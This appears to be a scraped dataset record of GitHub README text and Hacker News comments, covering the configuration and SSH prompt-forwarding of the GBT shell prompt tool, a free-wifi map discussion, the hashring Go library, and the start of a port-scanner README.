that displays icon of the operating system.\n\n- `GBT_CAR_OS_BG='235'`\n\n Background color of the car.\n\n- `GBT_CAR_OS_FG='white'`\n\n Foreground color of the car.\n\n- `GBT_CAR_OS_FM='none'`\n\n Formatting of the car.\n\n- `GBT_CAR_OS_FORMAT=' {{ Symbol }} '`\n\n Format of the car.\n\n- `GBT_CAR_OS_SYMBOL_BG`\n\n Background color of the `{{ Symbol }}` element.\n\n- `GBT_CAR_OS_SYMBOL_FG`\n\n Foreground color of the `{{ Symbol }}` element.\n\n- `GBT_CAR_OS_SYMBOL_FM`\n\n Formatting of the `{{ Symbol }}` element.\n\n- `GBT_CAR_OS_SYMBOL_TEXT`\n\n Text content of the `{{ Symbol }}` element.\n\n- `GBT_CAR_OS_NAME`\n\n The name of the symbol to display. Default value is selected by the system\n the shell runs at. Possible names and their symbols are:\n\n - `amzn` \uf270\n - `android` \uf17b\n - `arch` \uf300\n - `archarm` \uf300\n - `centos` \uf301\n - `cloud` \ue268\n - `coreos` \uf30f\n - `darwin` \ue711\n - `debian` \uf302\n - `docker` \ue7b0\n - `elementary` \uf311\n - `fedora` \uf303\n - `freebsd` \uf30e\n - `gentoo` \uf310\n - `linux` \ue712\n - `linuxmint` \uf304\n - `mageia` \uf306\n - `mandriva` \uf307\n - `opensuse` \uf308\n - `raspbian` \ue722\n - `redhat` \uf309\n - `sabayon` \uf313\n - `slackware` \uf30a\n - `ubuntu` \uf30c\n - `windows` \ue70f\n\n Example:\n\n ```shell\n export GBT_CAR_OS_NAME='arch'\n ```\n\n- `GBT_CAR_OS_DISPLAY='1'`\n\n Whether to display this car if it's in the list of cars (`GBT_CARS`).\n\n- `GBT_CAR_OS_WRAP='0'`\n\n Whether to wrap the prompt line in front of this car.\n\n- `GBT_CAR_OS_SEP_TEXT`\n\n Text content of the separator for this car.\n\n- `GBT_CAR_OS_SEP_BG`\n\n Background color of the separator for this car.\n\n- `GBT_CAR_OS_SEP_FG`\n\n Foreground color of the separator for this car.\n\n- `GBT_CAR_OS_SEP_FM`\n\n Formatting of the separator for this car.\n\n\n#### `PyVirtEnv` car\n\nCar that displays Python Virtual Environment name. This car is displayed only\nif the Python Virtual Environment is activated. The activation script usually\nprepends the shell prompt by the Virtual Environment name by default. 
In order\nto disable it, the following environment variable must be set:\n\n```shell\nexport VIRTUAL_ENV_DISABLE_PROMPT='1'\n```\n\nVariables used by the car:\n\n- `GBT_CAR_PYVIRTENV_BG='222'`\n\n Background color of the car.\n\n- `GBT_CAR_PYVIRTENV_FG='black'`\n\n Foreground color of the car.\n\n- `GBT_CAR_PYVIRTENV_FM='none'`\n\n Formatting of the car.\n\n- `GBT_CAR_PYVIRTENV_FORMAT=' {{ Icon }} {{ Name }} '`\n\n Format of the car.\n\n- `GBT_CAR_PYVIRTENV_ICON_BG`\n\n Background color of the `{{ Icon }}` element.\n\n- `GBT_CAR_PYVIRTENV_ICON_FG`\n\n Foreground color of the `{{ Icon }}` element.\n\n- `GBT_CAR_PYVIRTENV_ICON_FM`\n\n Formatting of the `{{ Icon }}` element.\n\n- `GBT_CAR_PYVIRTENV_ICON_TEXT`\n\n Text content of the `{{ Icon }}` element.\n\n- `GBT_CAR_PYVIRTENV_NAME_BG`\n\n Background color of the `{{ Name }}` element.\n\n- `GBT_CAR_PYVIRTENV_NAME_FG='33'`\n\n Foreground color of the `{{ Name }}` element.\n\n- `GBT_CAR_PYVIRTENV_NAME_FM`\n\n Formatting of the `{{ Name }}` element.\n\n- `GBT_CAR_PYVIRTENV_NAME_TEXT`\n\n The name of the Python Virtual Environment deduced from the `VIRTUAL_ENV`\n environment variable.\n\n- `GBT_CAR_PYVIRTENV_DISPLAY`\n\n Whether to display this car if it's in the list of cars (`GBT_CARS`).\n\n- `GBT_CAR_PYVIRTENV_WRAP='0'`\n\n Whether to wrap the prompt line in front of this car.\n\n- `GBT_CAR_PYVIRTENV_SEP_TEXT`\n\n Text content of the separator for this car.\n\n- `GBT_CAR_PYVIRTENV_SEP_BG`\n\n Background color of the separator for this car.\n\n- `GBT_CAR_PYVIRTENV_SEP_FG`\n\n Foreground color of the separator for this car.\n\n- `GBT_CAR_PYVIRTENV_SEP_FM`\n\n Formatting of the separator for this car.\n\n\n#### `Sign` car\n\nCar that displays the prompt character for the admin and user at the end of the\ntrain.\n\n- `GBT_CAR_SIGN_BG='default'`\n\n Background color of the car.\n\n- `GBT_CAR_SIGN_FG='default'`\n\n Foreground color of the car.\n\n- `GBT_CAR_SIGN_FM='none'`\n\n Formatting of the car.\n\n- `GBT_CAR_SIGN_FORMAT=' {{ Symbol }} '`\n\n Format of the car.\n\n- `GBT_CAR_SIGN_SYMBOL_BG`\n\n Background color of the `{{ Symbol }}` element.\n\n- `GBT_CAR_SIGN_SYMBOL_FG`\n\n Foreground color of the `{{ Symbol }}` element.\n\n- `GBT_CAR_SIGN_SYMBOL_FM='bold'`\n\n Formatting of the `{{ Symbol }}` element.\n\n- `GBT_CAR_SIGN_SYMBOL_FORMAT`\n\n Format of the `{{ Symbol }}` element. The format is either `{{ Admin }}` if\n the UID is 0 or `{{ User }}` if the UID is not 0.\n\n- `GBT_CAR_SIGN_ADMIN_BG`\n\n Background color of the `{{ Admin }}` element.\n\n- `GBT_CAR_SIGN_ADMIN_FG='red'`\n\n Foreground color of the `{{ Admin }}` element.\n\n- `GBT_CAR_SIGN_ADMIN_FM`\n\n Formatting of the `{{ Admin }}` element.\n\n- `GBT_CAR_SIGN_ADMIN_TEXT='#'`\n\n Text content of the `{{ Admin }}` element.\n\n- `GBT_CAR_SIGN_USER_BG`\n\n Background color of the `{{ User }}` element.\n\n- `GBT_CAR_SIGN_USER_FG='light_green'`\n\n Foreground color of the `{{ User }}` element.\n\n- `GBT_CAR_SIGN_USER_FM`\n\n Formatting of the `{{ User }}` element.\n\n- `GBT_CAR_SIGN_USER_TEXT='$'`\n\n Text content of the `{{ User }}` element.
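 For example, to use a different prompt character for normal users (this only\n overrides the documented text element and is shown here as an illustration):\n\n ```shell\n export GBT_CAR_SIGN_USER_TEXT='>'\n ```\n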
\n\n- `GBT_CAR_SIGN_DISPLAY='1'`\n\n Whether to display this car if it's in the list of cars (`GBT_CARS`).\n\n- `GBT_CAR_SIGN_WRAP='0'`\n\n Whether to wrap the prompt line in front of this car.\n\n- `GBT_CAR_SIGN_SEP_TEXT`\n\n Text content of the separator for this car.\n\n- `GBT_CAR_SIGN_SEP_BG`\n\n Background color of the separator for this car.\n\n- `GBT_CAR_SIGN_SEP_FG`\n\n Foreground color of the separator for this car.\n\n- `GBT_CAR_SIGN_SEP_FM`\n\n Formatting of the separator for this car.\n\n\n#### `Status` car\n\nCar that visualizes the return code of every command. By default, this car is\ndisplayed only when the return code is non-zero. If you want to display it even\nif the return code is zero, set the following variable:\n\n```shell\nexport GBT_CAR_STATUS_DISPLAY='1'\n```\n\nVariables used by the car:\n\n- `GBT_CAR_STATUS_BG`\n\n Background color of the car. It's either `GBT_CAR_STATUS_OK_BG` if the last\n command returned a `0` return code, otherwise `GBT_CAR_STATUS_ERROR_BG` is\n used.\n\n- `GBT_CAR_STATUS_FG='default'`\n\n Foreground color of the car. It's either `GBT_CAR_STATUS_OK_FG` if the last\n command returned a `0` return code, otherwise `GBT_CAR_STATUS_ERROR_FG` is\n used.\n\n- `GBT_CAR_STATUS_FM='none'`\n\n Formatting of the car. It's either `GBT_CAR_STATUS_OK_FM` if the last command\n returned a `0` return code, otherwise `GBT_CAR_STATUS_ERROR_FM` is used.\n\n- `GBT_CAR_STATUS_FORMAT=' {{ Symbol }} '`\n\n Format of the car. This can be changed to contain also the value of the\n return code:\n\n ```shell\n export GBT_CAR_STATUS_FORMAT=' {{ Symbol }} {{ Code }} '\n ```\n\n or the signal name of the return code:\n\n ```shell\n export GBT_CAR_STATUS_FORMAT=' {{ Symbol }} {{ Signal }} '\n ```\n\n If you want to display the Status car even if there is no error, you have\n to use the `{{ Details }}` element to prevent the `{{ Code }}` and/or\n `{{ Signal }}` from being displayed:\n\n ```shell\n export GBT_CAR_STATUS_DISPLAY=1\n export GBT_CAR_STATUS_FORMAT=' {{ Symbol }}{{ Details }} '\n ```\n\n Then you can modify the format of the `{{ Details }}` element like this for\n when there is an error:\n\n ```shell\n export GBT_CAR_STATUS_DETAILS_FORMAT=' {{ Code }} {{ Signal }}'\n ```\n\n- `GBT_CAR_STATUS_SYMBOL_BG`\n\n Background color of the `{{ Symbol }}` element.\n\n- `GBT_CAR_STATUS_SYMBOL_FG`\n\n Foreground color of the `{{ Symbol }}` element.\n\n- `GBT_CAR_STATUS_SYMBOL_FM='bold'`\n\n Formatting of the `{{ Symbol }}` element.\n\n- `GBT_CAR_STATUS_SYMBOL_FORMAT`\n\n Format of the `{{ Symbol }}` element. The format is either `{{ Error }}` if\n the last command returned a non-zero return code, otherwise `{{ Ok }}` is\n used.\n\n- `GBT_CAR_STATUS_SIGNAL_BG`\n\n Background color of the `{{ Signal }}` element.\n\n- `GBT_CAR_STATUS_SIGNAL_FG`\n\n Foreground color of the `{{ Signal }}` element.\n\n- `GBT_CAR_STATUS_SIGNAL_FM`\n\n Formatting of the `{{ Signal }}` element.\n\n- `GBT_CAR_STATUS_SIGNAL_TEXT`\n\n Text content of the `{{ Signal }}` element.\n\n- `GBT_CAR_STATUS_CODE_BG='red'`\n\n Background color of the `{{ Code }}` element.\n\n- `GBT_CAR_STATUS_CODE_FG='light_gray'`\n\n Foreground color of the `{{ Code }}` element.\n\n- `GBT_CAR_STATUS_CODE_FM='none'`\n\n Formatting of the `{{ Code }}` element.\n\n- `GBT_CAR_STATUS_CODE_TEXT`\n\n Text content of the `{{ Code }}` element. The return code.\n
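\n For example, to give the numeric return code its own background color when it\n is included in the car format (the color value here is only illustrative):\n\n ```shell\n export GBT_CAR_STATUS_FORMAT=' {{ Symbol }} {{ Code }} '\n export GBT_CAR_STATUS_CODE_BG='52'\n ```\n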
\n\n- `GBT_CAR_STATUS_ERROR_BG='red'`\n\n Background color of the `{{ Error }}` element.\n\n- `GBT_CAR_STATUS_ERROR_FG='light_gray'`\n\n Foreground color of the `{{ Error }}` element.\n\n- `GBT_CAR_STATUS_ERROR_FM='none'`\n\n Formatting of the `{{ Error }}` element.\n\n- `GBT_CAR_STATUS_ERROR_TEXT='\u2718'`\n\n Text content of the `{{ Error }}` element.\n\n- `GBT_CAR_STATUS_OK_BG='green'`\n\n Background color of the `{{ Ok }}` element.\n\n- `GBT_CAR_STATUS_OK_FG='light_gray'`\n\n Foreground color of the `{{ Ok }}` element.\n\n- `GBT_CAR_STATUS_OK_FM='none'`\n\n Formatting of the `{{ Ok }}` element.\n\n- `GBT_CAR_STATUS_OK_TEXT='\u2714'`\n\n Text content of the `{{ Ok }}` element.\n\n- `GBT_CAR_STATUS_DISPLAY`\n\n Whether to display this car if it's in the list of cars (`GBT_CARS`).\n\n- `GBT_CAR_STATUS_WRAP='0'`\n\n Whether to wrap the prompt line in front of this car.\n\n- `GBT_CAR_STATUS_SEP_TEXT`\n\n Text content of the separator for this car.\n\n- `GBT_CAR_STATUS_SEP_BG`\n\n Background color of the separator for this car.\n\n- `GBT_CAR_STATUS_SEP_FG`\n\n Foreground color of the separator for this car.\n\n- `GBT_CAR_STATUS_SEP_FM`\n\n Formatting of the separator for this car.\n\n\n#### `Time` car\n\nCar that displays the current date and time.\n\n- `GBT_CAR_TIME_BG='light_blue'`\n\n Background color of the car.\n\n- `GBT_CAR_TIME_FG='light_gray'`\n\n Foreground color of the car.\n\n- `GBT_CAR_TIME_FM='none'`\n\n Formatting of the car.\n\n- `GBT_CAR_TIME_FORMAT=' {{ DateTime }} '`\n\n Format of the car.\n\n- `GBT_CAR_TIME_DATETIME_BG`\n\n Background color of the `{{ DateTime }}` element.\n\n- `GBT_CAR_TIME_DATETIME_FG`\n\n Foreground color of the `{{ DateTime }}` element.\n\n- `GBT_CAR_TIME_DATETIME_FM`\n\n Formatting of the `{{ DateTime }}` element.\n\n- `GBT_CAR_TIME_DATETIME_FORMAT='{{ Date }} {{ Time }}'`\n\n Format of the `{{ DateTime }}` element.\n\n- `GBT_CAR_TIME_DATE_BG`\n\n Background color of the `{{ Date }}` element.\n\n- `GBT_CAR_TIME_DATE_FG`\n\n Foreground color of the `{{ Date }}` element.\n\n- `GBT_CAR_TIME_DATE_FM`\n\n Formatting of the `{{ Date }}` element.\n\n- `GBT_CAR_TIME_DATE_FORMAT='Mon 02 Jan'`\n\n Format of the `{{ Date }}` element. The format uses placeholders as described\n in the [`time.Format()`](https://golang.org/src/time/format.go#L87) Go\n function. For example, `January` is a placeholder for the current full month\n name, and `PM` is a placeholder that renders as `AM` if the current time is\n before noon or as `PM` if it is after noon. So in order to display the date in\n the `YYYY-MM-DD` format, the value of this variable should be `2006-01-02`.\n\n- `GBT_CAR_TIME_TIME_BG`\n\n Background color of the `{{ Time }}` element.\n\n- `GBT_CAR_TIME_TIME_FG='light_yellow'`\n\n Foreground color of the `{{ Time }}` element.\n\n- `GBT_CAR_TIME_TIME_FM`\n\n Formatting of the `{{ Time }}` element.\n\n- `GBT_CAR_TIME_TIME_FORMAT='15:04:05'`\n\n Format of the `{{ Time }}` element. The format principles are the same\n as for the `GBT_CAR_TIME_DATE_FORMAT` variable above. 
So in\n order to display time in the 12h format, the value of this variable should be\n `03:04:05 PM`.\n\n- `GBT_CAR_TIME_DISPLAY='1'`\n\n Whether to display this car if it's in the list of cars (`GBT_CARS`).\n\n- `GBT_CAR_TIME_WRAP='0'`\n\n Whether to wrap the prompt line in front of this car.\n\n- `GBT_CAR_TIME_SEP_TEXT`\n\n Text content of the separator for this car.\n\n- `GBT_CAR_TIME_SEP_BG`\n\n Background color of the separator for this car.\n\n- `GBT_CAR_TIME_SEP_FG`\n\n Foreground color of the separator for this car.\n\n- `GBT_CAR_TIME_SEP_FM`\n\n Formatting of the separator for this car.\n\n\nBenchmark\n---------\n\nBenchmark of GBT can be done by faking the output of GBT by a testing script\nwhich executes as minimum of commands as possible. For simplicity, the test will\nproduce output of the Git car only and will be done from within a directory with\na Git repository.\n\nThe testing script is using exactly the same commands like GBT to determine the\nGit branch, whether the Git repository contains any change and whether it's\nahead/behind of the remote branch. The script has the following content and is\nstored in `/tmp/test.sh`:\n\n```shell\nBRANCH=\"$(git symbolic-ref HEAD)\"\n[ -z \"$(git status --porcelain)\" ] && DIRTY_ICON='%{\\e[38;5;2m%}\u2714' || DIRTY_ICON='%{\\e[38;5;1m%}\u2718'\n[[ \"$(git rev-list --count HEAD..@{upstream})\" == '0' ]] && AHEAD_ICON='' || AHEAD_ICON=' \u2b06'\n[[ \"$(git rev-list --count @{upstream}..HEAD)\" == '0' ]] && BEHIND_ICON='' || BEHIND_ICON=' \u2b07'\n\necho -en \"%{\\e[0m%}%{\\e[48;5;7m%}%{\\e[38;5;0m%} %{\\e[48;5;7m%}%{\\e[38;5;0m%}\ue0a0%{\\e[48;5;7m%}%{\\e[38;5;0m%} %{\\e[48;5;7m%}%{\\e[38;5;0m%}${BRANCH##*/}%{\\e[48;5;7m%}%{\\e[38;5;0m%} %{\\e[48;5;7m%}%{\\e[38;5;0m%}%{\\e[48;5;7m%}$DIRTY_ICON%{\\e[48;5;7m%}%{\\e[38;5;0m%}%{\\e[48;5;7m%}%{\\e[38;5;0m%}%{\\e[48;5;7m%}%{\\e[38;5;0m%}$AHEAD_ICON%{\\e[48;5;7m%}%{\\e[38;5;0m%}%{\\e[48;5;7m%}%{\\e[38;5;0m%}$BEHIND_ICON%{\\e[48;5;7m%}%{\\e[38;5;0m%} %{\\e[0m%}\"\n```\n\nThe testing script produces the same output like GBT when run by Bash or ZSH:\n\n```shell\nbash /tmp/test.sh > /tmp/a\nzsh /tmp/test.sh > /tmp/b\nGBT_SHELL='zsh' GBT_CARS='Git' gbt > /tmp/c\ndiff /tmp/{a,b}\ndiff /tmp/{b,c}\n```\n\nWe will use ZSH to run 10 measurements of 100 executions of the testing script\nby Bash and ZSH as well as of GBT itself.\n\n```shell\n# Execution of the testing script by Bash\nfor N in $(seq 10); do time (for M in $(seq 100); do bash /tmp/test.sh 1>/dev/null 2>&1; done;) done 2>&1 | sed 's/.* //'\n0.95s user 1.05s system 102% cpu 1.944 total\n0.94s user 1.06s system 102% cpu 1.944 total\n0.93s user 1.05s system 102% cpu 1.930 total\n0.91s user 1.10s system 102% cpu 1.954 total\n0.92s user 1.07s system 102% cpu 1.933 total\n0.97s user 1.03s system 102% cpu 1.943 total\n0.92s user 1.07s system 102% cpu 1.931 total\n0.92s user 1.08s system 102% cpu 1.949 total\n0.89s user 1.11s system 102% cpu 1.938 total\n0.93s user 1.07s system 102% cpu 1.944 total\n# Execution of the testing script by ZSH\nfor N in $(seq 10); do time (for M in $(seq 100); do zsh /tmp/test.sh 1>/dev/null 2>&1; done;) done 2>&1 | sed 's/.* //'\n0.89s user 1.08s system 103% cpu 1.909 total\n0.82s user 1.15s system 103% cpu 1.906 total\n0.82s user 1.15s system 103% cpu 1.903 total\n0.84s user 1.13s system 103% cpu 1.907 total\n0.88s user 1.10s system 103% cpu 1.915 total\n0.88s user 1.09s system 103% cpu 1.907 total\n0.84s user 1.14s system 103% cpu 1.919 total\n0.85s user 1.11s system 103% cpu 1.901 total\n0.89s user 1.08s system 
103% cpu 1.914 total\n0.96s user 1.01s system 103% cpu 1.908 total\n# Execution of GBT\nfor N in $(seq 10); do time (for M in $(seq 100); do GBT_SHELL='zsh' GBT_CARS='Git' gbt 1>/dev/null 2>&1; done;) done 2>&1 | sed 's/.* //'\n1.03s user 1.19s system 115% cpu 1.922 total\n0.98s user 1.18s system 115% cpu 1.874 total\n1.06s user 1.11s system 115% cpu 1.880 total\n1.02s user 1.14s system 115% cpu 1.867 total\n1.04s user 1.17s system 115% cpu 1.918 total\n1.05s user 1.10s system 115% cpu 1.853 total\n1.07s user 1.11s system 115% cpu 1.895 total\n1.01s user 1.18s system 115% cpu 1.903 total\n1.08s user 1.03s system 115% cpu 1.825 total\n1.05s user 1.09s system 115% cpu 1.844 total\n```\n\nFrom the above it is visible that GBT performs faster than Bash and ZSH even\nthough the testing script was as simple as possible. You can also notice that GBT\nwas using more CPU than Bash or ZSH. That's probably because of the built-in\nconcurrency support in Go.\n\n\nPrompt forwarding\n-----------------\n\nIn order to enjoy the GBT prompt via SSH but also in Docker, Kubectl, Vagrant,\nMySQL or in Screen without the need to install GBT everywhere, you can use GBTS\n(GBT written in Shell). GBTS is a set of scripts which get forwarded to\napplications and remote connections and then executed to generate the nice-looking\nprompt.\n\nYou can start using it by doing the following:\n\n```shell\nexport GBT__HOME='/usr/share/gbt'\nsource $GBT__HOME/sources/gbts/cmd/local.sh\n```\n\nThis will automatically create command line aliases for all enabled plugins (by\ndefault `docker`, `gssh`, `kubectl`, `mysql`, `screen`, `ssh`, `su`, `sudo` and\n`vagrant`). Then just SSH to some remote server or enter some Docker container\n(even via `kubectl`) or Vagrant box and you should get the GBT prompt there.\n\nIf you want to have some of the default aliases available only on the remote\nsite, just un-alias them locally:\n\n```shell\nunalias sudo su\n```\n\nYou can also forward your own aliases which will then be available on any remote\nsite. For example, to have `alias ll='ls -l'` on any remote site, just create the\nfollowing alias and it will be automatically forwarded:\n\n```shell\nalias gbt___ll='ls -l'\n```\n\nThe idea behind prompt forwarding comes from Vladimir Babichev\n(@[mrdrup](https://github.com/mrdrup)) who was using it for several years\nbefore GBT even existed. After seeing the potential of GBT, he sparked the\nimplementation of prompt forwarding into GBT which later turned into GBTS.\n\n\n### Principle\n\nThe principle of GBTS is to pass the GBTS scripts to the application and then\nexecute them. This is done by concatenating all the GBTS scripts into one file\nand encoding it with the Base64 algorithm. This string, together with a few more\ncommands, is then used as an argument of the application, which stores it on the\nremote site in the `/tmp/.gbt.` file. In the same way, we create the\n`/tmp/.gbt..bash` script which is then used as a replacement for the real shell\non the remote site. For SSH it would look like this:\n\n```shell\nssh -t myserver \"export GBT__CONF='$GBT__CONF' && echo '' | base64 -d > \\$GBT__CONF && bash --rcfile \\$GBT__CONF\"\n```\n\nIn order to make all this invisible, we wrap that command into a function (e.g.\n`gbt_ssh`) and assign it to an `alias` of the same name as the original\napplication (e.g. 
`ssh`):\n\n```shell\nalias ssh='gbt_ssh'\n```\n\nThe same or very similar principle applies to other supported commands like\n`docker`, `gssh` ([GCP\nSSH](https://cloud.google.com/sdk/gcloud/reference/compute/ssh)), `kubectl`,\n`mysql`, `screen`, `su`, `sudo` and `vagrant`.\n\n\n### Additional settings\n\nGBTS has a few settings which can be used to influence its behaviour. See the\ndetails [here](https://github.com/jtyr/gbt/tree/master/sources/gbts/README.md).\n\n\n### MacOS users\n\nMaking GBTS work correctly between Linux and MacOS and vice versa requires a\nlittle bit of fiddling. The reason is that the basic command line tools like\n`date` and `base64` are very old on MacOS and mostly incompatible with the Linux\nworld. Some tools are even called differently (e.g. `md5sum` is called `md5`).\n\nTherefore, if you want to make the remote script verification work (making sure\nnobody changed the remote script while using it), the following variables must be\nset:\n\n```shell\n# Use 'md5' command instead of 'md5sum'\nexport GBT__SOURCE_MD5_LOCAL='md5'\n# Cut the 4th field from the output of 'md5'\nexport GBT__SOURCE_MD5_CUT_LOCAL='4'\n```\n\nIf you don't want to use this feature, you can disable it, in which case the above\nvariables won't be required:\n\n```shell\nexport GBT__SOURCE_SEC_DISABLE=1\n```\n\nWhen using the `ExecTime` car, the following variable must be set:\n\n```shell\n# Don't use nanoseconds in the 'ExecTime' car\nexport GBT__SOURCE_DATE_ARG='+%s'\n```\n\nFor maximum compatibility with GBT, it's recommended to install GNU `coreutils`\n(`brew install coreutils`) and instead of the variable above use these:\n\n```shell\n# Use 'gdate' instead of 'date'\nexport GBT__SOURCE_DATE='gdate'\n# Use 'gbase64' instead of 'base64' (only if you run GBT on a Mac)\nexport GBT__SOURCE_BASE64_LOCAL='gbase64'\n# Use 'gbase64' instead of 'base64' (only if you are connecting to a Mac via SSH)\nexport GBT__SOURCE_BASE64='gbase64'\n```\n\nWhen connecting to MacOS from Linux using `gbt_ssh` and not using `gbase64` on\nMacOS, the following variable must be set on Linux to make the Base64 decoding\nwork on MacOS:\n\n```shell\n# Use 'base64 -D' to decode Base64 encoded text\nexport GBT__SOURCE_BASE64_DEC='-D'\n```\n\n\n### Limitations\n\n- Requires Bash v4.x to run.\n- The [color representation](https://bugs.mysql.com/79755) and [support of\n unicode characters](https://bugs.mysql.com/89359) for MySQL are broken in MySQL\n 5.6 and above. But it works just fine in all versions of Percona and MariaDB.\n- Plugins `su` and `sudo` are not supported on MacOS.\n\n\nTODO\n----\n\nContribution to the following is more than welcome:\n\n- Optimize generated escape sequence\n - Don't decorate empty string\n - Don't decorate child element with the same attributes used by the parent\n- Implement templating language to allow more dynamic configuration\n - Jinja2-like syntax\n - Should be able to refer to variables from the local car\n - `GBT_CAR_GIT_BG=\"{% 'red' if Status == '{{ StatusDirty }}' else 'light_gray' %}\"`\n - Should be able to refer to ENV variables (e.g. `env('HOME')`)\n - Could be able to refer to variables from another car\n - Advanced functionality via pipes (e.g. 
` | substr(1,3)`)\n- Add support for GBT [plugins](https://golang.org/pkg/plugin/)\n - Load plugins with `GBT_PLUGINS='mycar1:/path/to/mycar1.so;mycar2:/path/to/mycar2.so'`\n - Load the plugin, read the `Car` symbol and assign the reference to the\n `mycar1` in the `carsFactory`\n- Implement Vim statusline using GBT as the generator\n- Implement Tmux statusline using GBT as the generator\n- Add weather car\n - Using Yahoo Weather API\n - Needs to cache the results in a file and refresh only if its timestamp is\n older than certain time. Or perhaps store the last update in env var?\n- Add more themes\n\n\nAuthor\n------\n\nJiri Tyr\n\n\nLicense\n-------\n\nMIT\n", "readme_type": "markdown", "hn_comments": "The map is really, really hard to zoom in and out.239,989,522 wifi networks: https://wigle.netI'd love to see this adjusted for population density -- what does a high wifi hotspots/person tell you?Maybe just that the area is wealthier. So what if you adjust for wealth too?Not seeing McDonald's. There's another 35,000 for you.Impressive bit of work but I couldn't help but think the title should be:Show HN: 500,000 free places to get hacked plotted around the worldHmmm I get the feeling that one of your 'sources' for the db comes from the users who have already installed your app. Just a tin-foil-hat hunch based on the density of nodes in certain areas (read: certain routes). Too bad 60%+ are HP-Printers or vmguests...either way it'd pay to clean all that up if you're promoting that they're free/open hotspots.What is the source of this data?\nAs I see my tier 3 city also has few free wifi listed here.Nice work! This reminds me to something I tried a while ago:https://wiffinity.comThey basically provide the same thing but as a crowdsourced list of truly free hotspots and you can connect to them through the app. Only available as a native app though...Is it really free if you're using a hotspot named NETGEAR? Because I'm assuming that one isn't really open on purpose.EDIT: Removed part about trailer court. I was wrong. That's actually a restaurant next to a trailer court. Nice place, too.Not all of these Wifi APs are \"Free\" and its partial in a lot of spots. Still, good effort.very good site!How do I zoom out?Any theories on why China has a notably less dense distribution?I've had two open ones for years that didn't make the map :(.https://location.services.mozilla.com/A point of constructive criticism is that there are some inconsistencies in how large-scale public WiFi seems to be handled. For instance, in Ann Arbor, MI every University of Michigan building AFAIK has free public WiFi (as well as a private network for university affiliates). However, I only see a few listings for the \"MGuest\" network in the area. Is there a better feasible way of handling this?This is not mapping free WiFi hotspots.\nThis is mapping open Wifi hotspots.They are not the same.For example, KPN in the Netherlands is not free, and xfinity wifi in the USA is not free.For this to have any sort of credibility, there needs to be a discriminant filter mapping truly free vs open hotspots.For me this current map is too noisy to be of value. Try using it for free internet, and you too may run into disillusionment and frustration.Looks really great - love the web view of WiFi density, and great to see more efforts in this space.We've built something similar at OpenSignal. 
Our WifiMapper [1] app on iOS and Android has a database of over 2 million networks, and we're also crowdsourcing a database of passwords and connection speeds.[1] https://www.wifimapper.com/Nice to see a Starbucks hotspot in the middle of Thames river (London)... doesn't show the depth ;)This isn't working for me, after I zoom in past a certain level, all the blue dots just disappear. Clicking a city name search result zooms in so far that the map goes blank (presumably it's past the available tile sets) Tested in Safari and ChromeIf an WiFi hotspot doesn't have a password doesn't mean it's free.Are those providing internet access, or just unprotected networks ?I'm always glad to see maps using OpenStreetMap data over Google Maps.I always find it fun to look over the edits I've made, and it helps point out where more detail would be useful for different use cases.Searching by zip code zooms the map into areas 20-40 miles outside of the actual area code. At least that was my experience with the 2 that I tried.In case anyone can't find the Netherlands, I could understand why: http://i.snag.gy/7vbiZ.jpgThis also explains why I'm so frustrated with WiFi abroad: I probably got spoiled here. Here we can find WiFi in the most unlikely of places (e.g. supermarkets, buses); in Germany you can find one in a coffee shop if you're lucky, but that one is probably paid as well, just like all the other ones.Bad data set. You are missing most of the free wifi spots in my town, but do show a number of people who just haven't secured their routers.Wrong question.I don't care where I can find free WiFi. Nowadays, every damn coffee shop, hotel or mall has free Wifi\u2014I care about fast and free WiFi with speedy up- & downloads and low latency. Well executed implementation though.EDIT: Why the downvote?I am redirected to https://meshable.io/map which is a blank page. 
I even disabled uBlock and refreshed the page and still saw nothing.All I can see if a hand for a cursor, and my right click button is disabled to even check on the source.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "serialx/hashring", "link": "https://github.com/serialx/hashring", "tags": [], "stars": 524, "description": "Consistent hashing \"hashring\" implementation in golang (using the same algorithm as libketama)", "lang": "Go", "repo_lang": "", "readme": "hashring\n============================\n\nImplements consistent hashing that can be used when\nthe number of server nodes can increase or decrease (like in memcached).\nThe hashing ring is built using the same algorithm as libketama.\n\nThis is a port of Python hash_ring library \nin Go with the extra methods to add and remove nodes.\n\n\nUsing\n============================\n\nImporting ::\n\n```go\nimport \"github.com/serialx/hashring\"\n```\n\nBasic example usage ::\n\n```go\nmemcacheServers := []string{\"192.168.0.246:11212\",\n \"192.168.0.247:11212\",\n \"192.168.0.249:11212\"}\n\nring := hashring.New(memcacheServers)\nserver, _ := ring.GetNode(\"my_key\")\n```\n\nTo fulfill replication requirements, you can also get a list of servers that should store your key.\n```go\nserversInRing := []string{\"192.168.0.246:11212\",\n \"192.168.0.247:11212\",\n \"192.168.0.248:11212\",\n \"192.168.0.249:11212\",\n \"192.168.0.250:11212\",\n \"192.168.0.251:11212\",\n \"192.168.0.252:11212\"}\n\nreplicaCount := 3\nring := hashring.New(serversInRing)\nserver, _ := ring.GetNodes(\"my_key\", replicaCount)\n```\n\nUsing weights example ::\n\n```go\nweights := make(map[string]int)\nweights[\"192.168.0.246:11212\"] = 1\nweights[\"192.168.0.247:11212\"] = 2\nweights[\"192.168.0.249:11212\"] = 1\n\nring := hashring.NewWithWeights(weights)\nserver, _ := ring.GetNode(\"my_key\")\n```\n\nAdding and removing nodes example ::\n\n```go\nmemcacheServers := []string{\"192.168.0.246:11212\",\n \"192.168.0.247:11212\",\n \"192.168.0.249:11212\"}\n\nring := hashring.New(memcacheServers)\nring = ring.RemoveNode(\"192.168.0.246:11212\")\nring = ring.AddNode(\"192.168.0.250:11212\")\nserver, _ := ring.GetNode(\"my_key\")\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "liamg/furious", "link": "https://github.com/liamg/furious", "tags": ["port-scanner", "ip-scanner", "network-scanner", "security"], "stars": 524, "description": ":angry: Go IP/port scanner with SYN (stealth) scanning and device manufacturer identification", "lang": "Go", "repo_lang": "", "readme": "# Furious IP/Port Scanner\n\nFurious is a fast, lightweight, portable network scanner.\n\n![Screenshot 1](./screenshot.png)\n![Screenshot 2](./screenshot2.png)\n\nI haven't done any proper performance testing, but a SYN scan of a single host, including all known ports (~6000) will typically take in the region of 4 seconds. On the same machine, nmap took 98 seconds and produced exactly the same results.\n\n## Install\n\nYou'll need to install libpcap.\n\n- On Linux, install `libpcap` with your package manager\n- On OSX, `brew install libpcap`\n- On Windows, install [WinPcap](https://www.winpcap.org/)\n\nThen just:\n\n```\ngo get -u 